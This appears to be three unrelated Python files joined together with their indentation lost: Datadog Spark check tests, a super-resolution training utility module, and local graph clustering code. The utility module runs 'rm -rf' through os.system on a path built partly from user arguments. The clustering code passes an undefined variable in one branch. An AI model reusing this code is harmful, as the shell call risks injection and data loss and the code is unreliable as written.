# Check the running stage metrics
for metric, value in iteritems(SPARK_STAGE_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_RUNNING_METRIC_TAGS)
# Check the complete stage metrics
for metric, value in iteritems(SPARK_STAGE_COMPLETE_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_COMPLETE_METRIC_TAGS)
# Check the driver metrics
for metric, value in iteritems(SPARK_DRIVER_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the executor level metrics
for metric, value in iteritems(SPARK_EXECUTOR_LEVEL_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_EXECUTOR_LEVEL_METRIC_TAGS)
# Check the summary executor metrics
for metric, value in iteritems(SPARK_EXECUTOR_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the RDD metrics
for metric, value in iteritems(SPARK_RDD_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the streaming statistics metrics
for metric, value in iteritems(SPARK_STREAMING_STATISTICS_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the structured streaming metrics
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the service tests
for sc in aggregator.service_checks(STANDALONE_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:8080'] + CLUSTER_TAGS
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:4040'] + CLUSTER_TAGS
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
@pytest.mark.unit
def test_standalone_pre20(aggregator, dd_run_check):
with mock.patch('requests.get', standalone_requests_pre20_get_mock):
c = SparkCheck('spark', {}, [STANDALONE_CONFIG_PRE_20])
dd_run_check(c)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the running job metrics
for metric, value in iteritems(SPARK_JOB_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_RUNNING_METRIC_TAGS)
# Check the succeeded job metrics
for metric, value in iteritems(SPARK_JOB_SUCCEEDED_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_JOB_SUCCEEDED_METRIC_TAGS)
# Check the running stage metrics
for metric, value in iteritems(SPARK_STAGE_RUNNING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_RUNNING_METRIC_TAGS)
# Check the complete stage metrics
for metric, value in iteritems(SPARK_STAGE_COMPLETE_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_STAGE_COMPLETE_METRIC_TAGS)
# Check the driver metrics
for metric, value in iteritems(SPARK_DRIVER_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the executor level metrics
for metric, value in iteritems(SPARK_EXECUTOR_LEVEL_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=SPARK_EXECUTOR_LEVEL_METRIC_TAGS)
# Check the summary executor metrics
for metric, value in iteritems(SPARK_EXECUTOR_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the RDD metrics
for metric, value in iteritems(SPARK_RDD_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the streaming statistics metrics
for metric, value in iteritems(SPARK_STREAMING_STATISTICS_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the structured streaming metrics
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
aggregator.assert_metric(metric, value=value, tags=COMMON_TAGS)
# Check the service tests
for sc in aggregator.service_checks(STANDALONE_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:8080'] + CLUSTER_TAGS
for sc in aggregator.service_checks(SPARK_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
assert sc.tags == ['url:http://localhost:4040'] + CLUSTER_TAGS
# Assert coverage for this check on this instance
aggregator.assert_all_metrics_covered()
@pytest.mark.unit
def test_metadata(aggregator, datadog_agent, dd_run_check):
with mock.patch('requests.get', standalone_requests_pre20_get_mock):
c = SparkCheck(CHECK_NAME, {}, [STANDALONE_CONFIG_PRE_20])
c.check_id = "test:123"
dd_run_check(c)
c._collect_version(SPARK_APP_URL, None)
raw_version = "2.4.0"
major, minor, patch = raw_version.split(".")
version_metadata = {
'version.major': major,
'version.minor': minor,
'version.patch': patch,
'version.raw': raw_version,
}
datadog_agent.assert_metadata('test:123', version_metadata)
@pytest.mark.unit
def test_disable_legacy_cluster_tags(aggregator, dd_run_check):
instance = MESOS_FILTERED_CONFIG
instance['disable_legacy_cluster_tag'] = True
with mock.patch('requests.get', mesos_requests_get_mock):
c = SparkCheck('spark', {}, [instance])
dd_run_check(c)
for sc in aggregator.service_checks(MESOS_SERVICE_CHECK):
assert sc.status == SparkCheck.OK
# Only spark_cluster tag is present
assert sc.tags == ['url:http://localhost:5050', 'spark_cluster:{}'.format(CLUSTER_NAME)]
assert aggregator.metrics_asserted_pct == 100.0
@pytest.mark.unit
@pytest.mark.parametrize(
"instance, requests_get_mock, base_tags",
[
(DRIVER_CONFIG, driver_requests_get_mock, COMMON_TAGS + CUSTOM_TAGS),
(YARN_CONFIG, yarn_requests_get_mock, COMMON_TAGS + CUSTOM_TAGS),
(MESOS_CONFIG, mesos_requests_get_mock, COMMON_TAGS + CUSTOM_TAGS),
(STANDALONE_CONFIG, standalone_requests_get_mock, COMMON_TAGS),
(STANDALONE_CONFIG_PRE_20, standalone_requests_pre20_get_mock, COMMON_TAGS),
],
ids=["driver", "yarn", "mesos", "standalone", "standalone_pre_20"],
)
def test_enable_query_name_tag_for_structured_streaming(
aggregator, dd_run_check, instance, requests_get_mock, base_tags
):
instance['enable_query_name_tag'] = True
with mock.patch('requests.get', requests_get_mock):
c = SparkCheck('spark', {}, [instance])
dd_run_check(c)
for metric, value in iteritems(SPARK_STRUCTURED_STREAMING_METRIC_VALUES):
tags = base_tags
if metric not in SPARK_STRUCTURED_STREAMING_METRIC_NO_TAGS:
tags = base_tags + ["query_name:my_named_query"]
aggregator.assert_metric(metric, value=value, tags=tags)
def test_do_not_crash_on_version_collection_failure():
running_apps = {'foo': ('bar', 'http://foo.bar/'), 'foo2': ('bar', 'http://foo.bar/')}
rest_requests_to_json = mock.MagicMock(side_effect=[RequestException, []])
c = SparkCheck('spark', {}, [INSTANCE_STANDALONE])
with mock.patch.object(c, '_rest_request_to_json', rest_requests_to_json):
# ensure no exception is raised by calling collect_version
assert not c._collect_version(running_apps, [])
@pytest.mark.unit
def test_ssl(dd_run_check):
run_ssl_server()
c = SparkCheck('spark', {}, [SSL_CONFIG])
with pytest.raises(Exception, match="\\[SSL: CERTIFICATE_VERIFY_FAILED\\] certificate verify failed"):
dd_run_check(c, extract_message=True)
@pytest.mark.unit
def test_ssl_no_verify(dd_run_check):
# Disable ssl warning for self signed cert/no verify
urllib3.disable_warnings()
run_ssl_server()
c = SparkCheck('spark', {}, [SSL_NO_VERIFY_CONFIG])
dd_run_check(c)
@pytest.mark.unit
def test_ssl_cert(dd_run_check):
# Disable ssl warning for self signed cert/no verify
urllib3.disable_warnings()
run_ssl_server()
c = SparkCheck('spark', {}, [SSL_CERT_CONFIG])
dd_run_check(c)
@pytest.mark.unit
def test_do_not_crash_on_single_app_failure():
running_apps = {'foo': ('bar', 'http://foo.bar/'), 'foo2': ('bar', 'http://foo.bar/')}
results = []
rest_requests_to_json = mock.MagicMock(side_effect=[Exception, results])
c = SparkCheck('spark', {}, [INSTANCE_STANDALONE])
with mock.patch.object(c, '_rest_request_to_json', rest_requests_to_json), mock.patch.object(c, '_collect_version'):
c._get_spark_app_ids(running_apps, [])
assert rest_requests_to_json.call_count == 2
class StandaloneAppsResponseHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
with open(os.path.join(FIXTURE_DIR, 'spark_standalone_apps'), 'rb') as f:
self.wfile.write(f.read())
def run_ssl_server():
cert_file = os.path.join(CERTIFICATE_DIR, 'server.pem')
httpd = BaseHTTPServer.HTTPServer((SSL_SERVER_ADDRESS, SSL_SERVER_PORT), StandaloneAppsResponseHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=cert_file, server_side=False)
httpd.timeout = 5
threading.Thread(target=httpd.handle_request).start()
time.sleep(0.5)
return httpd
SPARK_DRIVER_CLUSTER_TAGS = ['spark_cluster:{}'.format('SparkDriver'), 'cluster_name:{}'.format('SparkDriver')]
@pytest.mark.integration
@pytest.mark.usefixtures('dd_environment')
def test_integration_standalone(aggregator, dd_run_check):
c = SparkCheck('spark', {}, [INSTANCE_STANDALONE])
dd_run_check(c)
expected_metric_values = (
SPARK_JOB_RUNNING_METRIC_VALUES,
SPARK_STAGE_RUNNING_METRIC_VALUES,
SPARK_DRIVER_METRIC_VALUES,
SPARK_STRUCTURED_STREAMING_METRIC_VALUES,
SPARK_EXECUTOR_METRIC_VALUES,
)
optional_metric_values = (SPARK_STREAMING_STATISTICS_METRIC_VALUES,)
# Extract all keys
expected_metrics = set(k for j in expected_metric_values for k in j)
optional_metrics = set(k for j in optional_metric_values for k in j)
# Check the running job metrics
for metric in expected_metrics:
aggregator.assert_metric(metric)
for metric in optional_metrics:
aggregator.assert_metric(metric, at_least=0)
aggregator.assert_service_check(
'spark.standalone_master.can_connect',
status=SparkCheck.OK,
tags=['url:{}'.format('http://spark-master:8080')] + CLUSTER_TAGS,
)
aggregator.assert_all_metrics_covered()
@pytest.mark.integration
@pytest.mark.usefixtures('dd_environment')
def test_integration_driver_1(aggregator, dd_run_check):
c = SparkCheck('spark', {}, [INSTANCE_DRIVER_1])
dd_run_check(c)
all_metric_values = (
SPARK_JOB_RUNNING_METRIC_VALUES,
SPARK_STAGE_RUNNING_METRIC_VALUES,
SPARK_DRIVER_METRIC_VALUES,
)
optional_metric_values = (
SPARK_STREAMING_STATISTICS_METRIC_VALUES,
SPARK_EXECUTOR_METRIC_VALUES,
)
# Extract all keys
expected_metrics = set(k for j in all_metric_values for k in j)
optional_metrics = set(k for j in optional_metric_values for k in j)
# Check the running job metrics
for metric in expected_metrics:
aggregator.assert_metric(metric)
for metric in optional_metrics:
aggregator.assert_metric(metric, at_least=0)
aggregator.assert_service_check(
'spark.driver.can_connect',
status=SparkCheck.OK,
tags=['url:{}'.format('http://spark-app-1:4040')] + SPARK_DRIVER_CLUSTER_TAGS,
)
aggregator.assert_all_metrics_covered()
@pytest.mark.integration
@pytest.mark.usefixtures('dd_environment')
def test_integration_driver_2(aggregator, dd_run_check):
c = SparkCheck('spark', {}, [INSTANCE_DRIVER_2])
dd_run_check(c)
all_metric_values = (
SPARK_DRIVER_METRIC_VALUES,
SPARK_STRUCTURED_STREAMING_METRIC_VALUES,
)
optional_metric_values = (
SPARK_STAGE_RUNNING_METRIC_VALUES,
SPARK_EXECUTOR_METRIC_VALUES,
SPARK_JOB_RUNNING_METRIC_VALUES,
SPARK_JOB_SUCCEEDED_METRIC_VALUES,
)
# Extract all keys
expected_metrics = set(k for j in all_metric_values for k in j)
optional_metrics = set(k for j in optional_metric_values for k in j)
# Check the running job metrics
for metric in expected_metrics:
aggregator.assert_metric(metric)
for metric in optional_metrics:
aggregator.assert_metric(metric, at_least=0)
aggregator.assert_service_check(
'spark.driver.can_connect',
status=SparkCheck.OK,
tags=['url:{}'.format('http://spark-app-2:4050')] + SPARK_DRIVER_CLUSTER_TAGS,
)
aggregator.assert_all_metrics_covered()
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.model_save_path = ''
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment/', args.save)
else:
self.dir = os.path.join('..', 'experiment/', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model/'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt'))else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model/'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}_x{}_'.format(filename, scale)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
args.optimizer = 'SGD' #modify this later
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
|
find_clusters.py
|
import scipy as sp
import numpy as np
import time
import random
import queue
import multiprocessing as mp
import copy
from collections import defaultdict
from sklearn.cluster import AgglomerativeClustering
from sklearn.metrics import pairwise_distances
from joblib import Parallel, delayed
from .approximate_pagerank import approximate_pagerank
from .approximate_pagerank_weighted import approximate_PageRank_weighted
from .spectral_clustering import spectral_clustering
from .flow_clustering import flow_clustering
from .GraphLocal import GraphLocal
from .cpp import *
def compute_embedding(g,
node,
rho_list,
alpha_list,
nsamples_from_rho,
nsamples_from_alpha,
localmethod,
normalize,
normalized_objective,
epsilon,
iterations,
cpp):
ref_node = [node]
sampled_rhos = list(np.geomspace(rho_list[0], rho_list[1], nsamples_from_rho, endpoint=True))
sampled_alphas = list(np.geomspace(alpha_list[0], alpha_list[1], nsamples_from_alpha, endpoint=True))
min_crit = 10000
min_crit_embedding = 0
for alpha in list(reversed(sampled_alphas)):
for rho in list(reversed(sampled_rhos)):
output = approximate_pagerank(g, ref_node, iterations=iterations, alpha=alpha, rho=rho, epsilon=epsilon,
cpp=cpp, normalize=normalize, normalized_objective=normalized_objective,
method=localmethod)
conductance = g.compute_conductance(output[0])
crit = conductance
if crit <= min_crit:
min_crit = crit
min_crit_embedding = output
return min_crit_embedding
def compute_embedding_and_improve(g,
node,
rho_list,
alpha_list,
nsamples_from_rho,
nsamples_from_alpha,
localmethod,
normalize,
normalized_objective,
epsilon,
iterations,
cpp):
ref_node = [node]
sampled_rhos = list(np.geomspace(rho_list[0], rho_list[1], nsamples_from_rho, endpoint=True))
sampled_alphas = list(np.geomspace(alpha_list[0], alpha_list[1], nsamples_from_alpha, endpoint=True))
min_crit = 10000
min_crit_embedding = 0
for alpha in list(reversed(sampled_alphas)):
for rho in list(reversed(sampled_rhos)):
output = approximate_pagerank(g, ref_node, iterations=iterations, alpha=alpha, rho=rho, epsilon=epsilon,
cpp=cpp, normalize=normalize, normalized_objective=normalized_objective,
method=localmethod)
conductance = g.compute_conductance(output[0])
crit = conductance
if crit <= min_crit:
min_crit = crit
min_crit_embedding = output
output_mqi = flow_clustering(g,min_crit_embedding[0],method="mqi_weighted")
return output_mqi
def find_clusters(g,
nclusters,
rho_list,
alpha_list,
localmethod: str = 'l1reg-rand',
normalize: bool = False,
normalized_objective: bool = False,
cpp: bool = True,
epsilon: float = 1.0e-2,
iterations: int = 10000000,
nsamples_from_rho: int = 50,
nsamples_from_alpha: int = 50,
linkage: str = 'average',
norm_type: int = 2,
njobs: int = 1,
prefer: str = 'threads',
backend: str = 'multiprocessing',
metric: str ='euclidean'):
"""
Find clusters in a graph using local graph clustering.
--------------------------------
This method runs local graph clustering for each node in the graph in parallel.
Aggregates the embeddings and compute a pairwise distance matrix.
Then uses agglomerative clustering to find the clusters.
Parameters
----------
g: GraphLocal
nclusters: int
Number of clusters to be returned
rho_list: 2D list of floats
This is an interval of rhos, the regularization parameter for l1-regularized PageRank.
The first element should be smaller than the second elelement of the list.
alpha_list: 2D list of floats
This is an interval of alphas, the teleportation parameter for l1-regularized PageRank.
The first element should be smaller than the second elelement of the list.
The smaller the more global the personalized PageRank vector is.
Parameters (optional)
---------------------
nsamples_from_rho: int
Number of samples of rho parameters to be selected from interval rho_list.
nsamples_from_alpha: int
Number of samples of alpha parameters to be selected from interval alpha_list.
localmethod: string
Default = 'l1reg-rand'
Which method to use.
Options: 'l1reg', 'l1reg-rand'.
iterations: int
Default = 1000000
Maximum number of iterations of ACL algorithm.
epsilon: float
Default = 1.0e-2
Tolerance for localmethod
normalize: bool
Default = True
Normalize the output to be directly input into sweepcut routines.
normalized_objective: bool
Default = True
Use normalized Laplacian in the objective function, works only for "method=l1reg" and "cpp=True"
cpp: bool
Default = True
If true calls the cpp code for approximate pagerank, otherwise, it calls the python code.
linkage: str
Default = 'average'
Which linkage criterion to use for agglomerative clustering.
For other options check:
https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html
metric: str
Default = 'euclidean'
Metric for measuring distances among nodes.
For details check:
https://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise_distances.html
norm_type: int
Default = 2
Norm for normalization of the embeddings.
njobs: int
Default = 1
Number of jobs to be run in parallel
prefer, backend: str
Check documentation of https://joblib.readthedocs.io/en/latest/
Returns
-------
labels: np.ndarray
An np.ndarray of the cluster allocation of each node.
For example labels[i] is the cluster of node i.
"""
n = g._num_vertices
# is_weighted = g.weighted
if njobs > 1:
results = Parallel(n_jobs=njobs, prefer=prefer, backend=backend)(delayed(compute_embedding)(g,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in range(n))
else:
results =[compute_embedding(g,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,alpha,normalize,normalized_objective,epsilon,iterations,cpp) for node in range(n)]
sum_ = 0
JA = [0]
IA = []
A = []
for data in results:
vec = data[1]/np.linalg.norm(data[1],norm_type)
how_many = len(data[0])
sum_ += how_many
JA.append(sum_)
IA.extend(list(data[0]))
A.extend(list(vec))
X = sp.sparse.csc_matrix((A, IA, JA), shape=(n, n))
X = X.transpose()
Z = pairwise_distances(X, metric=metric, n_jobs=njobs)
clustering = AgglomerativeClustering(n_clusters=nclusters,affinity="precomputed",linkage=linkage).fit(Z)
labels = clustering.labels_
return labels
def compute_all_embeddings(g,
rho_list,
alpha_list,
localmethod: str = 'l1reg-rand',
normalize: bool = False,
normalized_objective: bool = False,
cpp: bool = True,
epsilon: float = 1.0e-2,
iterations: int = 10000000,
nsamples_from_rho: int = 50,
nsamples_from_alpha: int = 50,
njobs: int = 1,
prefer: str = 'threads',
backend: str = 'multiprocessing'):
"""
This method runs local graph clustering for each node in the graph in parallel.
Returns the embeddings for each node in a list. Each element of the list corresponds to an embedding
of a node.
Parameters
----------
g: GraphLocal
rho_list: 2D list of floats
This is an interval of rhos, the regularization parameter for l1-regularized PageRank.
The first element should be smaller than the second elelement of the list.
alpha_list: 2D list of floats
This is an interval of alphas, the teleportation parameter for l1-regularized PageRank.
The first element should be smaller than the second elelement of the list.
The smaller the more global the personalized PageRank vector is.
Parameters (optional)
---------------------
nsamples_from_rho: int
Number of samples of rho parameters to be selected from interval rho_list.
nsamples_from_alpha: int
Number of samples of alpha parameters to be selected from interval alpha_list.
localmethod: string
Default = 'l1reg-rand'
Which method to use.
Options: 'l1reg', 'l1reg-rand'.
iterations: int
Default = 1000000
Maximum number of iterations of ACL algorithm.
epsilon: float
Default = 1.0e-2
Tolerance for localmethod
normalize: bool
Default = True
Normalize the output to be directly input into sweepcut routines.
normalized_objective: bool
Default = True
Use normalized Laplacian in the objective function, works only for "method=l1reg" and "cpp=True"
cpp: bool
Default = True
If true calls the cpp code for approximate pagerank, otherwise, it calls the python code.
njobs: int
Default = 1
Number of jobs to be run in parallel
prefer, backend: str
Check documentation of https://joblib.readthedocs.io/en/latest/
Returns
-------
embeddings: list of arrays
Each element corresponds to an embedding of a node.
"""
n = g._num_vertices
# is_weighted = g.weighted
if njobs > 1:
embeddings = Parallel(n_jobs=njobs, prefer=prefer, backend=backend)(delayed(compute_embedding)(g,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in range(n))
else:
embeddings =[compute_embedding(g,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in range(n)]
return embeddings
def normalize_embeddings(g, embeddings,
norm_type: int = 2):
"""
Normalize the embeddings.
Parameters
----------
g: GraphLocal
embeddings: list of arrays
Each element corresponds to an embedding of a node.
Parameters (optional)
---------------------
norm_type: int
Default = 2
Norm for normalization of the embeddings.
Returns
-------
X: csc matrix
The embeddings matrix. Each row corresponds to an embedding of a node.
"""
n = g._num_vertices
sum_ = 0
JA = [0]
IA = []
A = []
for data in embeddings:
vec = data[1]/np.linalg.norm(data[1],norm_type)
how_many = len(data[0])
sum_ += how_many
JA.append(sum_)
IA.extend(list(data[0]))
A.extend(list(vec))
X = sp.sparse.csc_matrix((A, IA, JA), shape=(n, n))
X = X.transpose().tocsr()
# Z = pairwise_distances(X, metric=metric, n_jobs=njobs)
return X
def compute_clusters_given_distance(nclusters,Z,linkage: str = 'average'):
"""
Find clusters in a graph using local graph clustering.
--------------------------------
Each node is represented by a sparse local graph clustering vector.
Then it uses agglomerative clustering to find the clusters.
Parameters
----------
nclusters: int
Number of clusters to be returned
Z: 2D np.ndarray
The pairwise distance matrix Z. For example, component Z[i,j]
is the distance between nodes i and j.
Parameters (optional)
---------------------
linkage: str
Default = 'average'
Which linkage criterion to use for agglomerative clustering.
For other options check:
https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html
Returns
-------
labels: np.ndarray
An np.ndarray of the cluster allocation of each node.
For example labels[i] is the cluster of node i.
"""
clustering = AgglomerativeClustering(n_clusters=nclusters,affinity="precomputed",linkage=linkage).fit(Z)
labels = clustering.labels_
return labels
def graph_segmentation(g,
rho_list,
alpha_list,
localmethod: str = 'l1reg-rand',
normalize: bool = False,
normalized_objective: bool = False,
cpp: bool = True,
epsilon: float = 1.0e-2,
iterations: int = 10000000,
nsamples_from_rho: int = 50,
nsamples_from_alpha: int = 50,
njobs = 1,
prefer: str = 'threads',
backend: str = 'multiprocessing',
how_many_in_parallel = 5,
ratio = 0.01):
"""
Segment the graph into pieces by peeling off clusters in parallel using local graph clustering.
--------------------------------
Parameters
----------
g: GraphLocal
rho_list: 2D list of floats
This is an interval of rhos, the regularization parameter for l1-regularized PageRank.
The first element should be smaller than the second elelement of the list.
alpha_list: 2D list of floats
This is an interval of alphas, the teleportation parameter for l1-regularized PageRank.
The first element should be smaller than the second elelement of the list.
The smaller the more global the personalized PageRank vector is.
Parameters (optional)
---------------------
nsamples_from_rho: int
Number of samples of rho parameters to be selected from interval rho_list.
nsamples_from_alpha: int
Number of samples of alpha parameters to be selected from interval alpha_list.
localmethod: string
Default = 'l1reg-rand'
Which method to use.
Options: 'l1reg', 'l1reg-rand'.
iterations: int
Default = 1000000
Maximum number of iterations of ACL algorithm.
epsilon: float
Default = 1.0e-2
Tolerance for localmethod
normalize: bool
Default = True
Normalize the output to be directly input into sweepcut routines.
normalized_objective: bool
Default = True
Use normalized Laplacian in the objective function, works only for "method=l1reg" and "cpp=True"
cpp: bool
Default = True
If true calls the cpp code for approximate pagerank, otherwise, it calls the python code.
njobs: int
Default = 1
Number of jobs to be run in parallel
prefer, backend: str
Check documentation of https://joblib.readthedocs.io/en/latest/
how_many_in_parallel: int
Default = 20
Number of segments that are computed in parallel.
There is a trade-off here.
ratio: float
Default = 0.01
Let n be the number of nodes, this segmentation code will ignore the last ratio*n nodes,
and it will cluster them as one cluster.
Returns
-------
info: list of lists
Each element of the list is another list with two elements.
The first element is the indices of the a segment, while the second element
is the vector representation of that segment.
labels: np.ndarray
An np.ndarray of the cluster allocation of each node.
For example labels[i] is the cluster of node i.
"""
g_copy = GraphLocal.from_sparse_adjacency(g.adjacency_matrix)
candidates = list(range(g_copy._num_vertices))
labels = np.zeros(g_copy._num_vertices,dtype=np.int32)
info = []
ct = 0
while True:
if njobs > 1:
select_from = list(range(g_copy._num_vertices))
ref_nodes = random.sample(select_from, min(how_many_in_parallel,len(select_from)))
results = Parallel(n_jobs=njobs, prefer=prefer, backend=backend)(delayed(compute_embedding)(g_copy,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in ref_nodes)
else:
select_from = list(range(g_copy._num_vertices))
ref_nodes = random.sample(select_from, njobs)
results =[compute_embedding(g_copy,node,rho_list,alpha_list,nsamples_from_rho,nsamples_from_alpha,localmethod,normalize,normalized_objective,epsilon,iterations,cpp) for node in ref_nodes]
union_sets_to_remove = set()
for res in results:
idx = [candidates[i] for i in res[0]]
labels[idx] = ct
ct += 1
union_sets_to_remove.update(res[0])
info.append([idx,res[1]])
for index in sorted(list(union_sets_to_remove), reverse=True):
del candidates[index]
indices = list(set(range(g_copy._num_vertices)) - set(union_sets_to_remove))
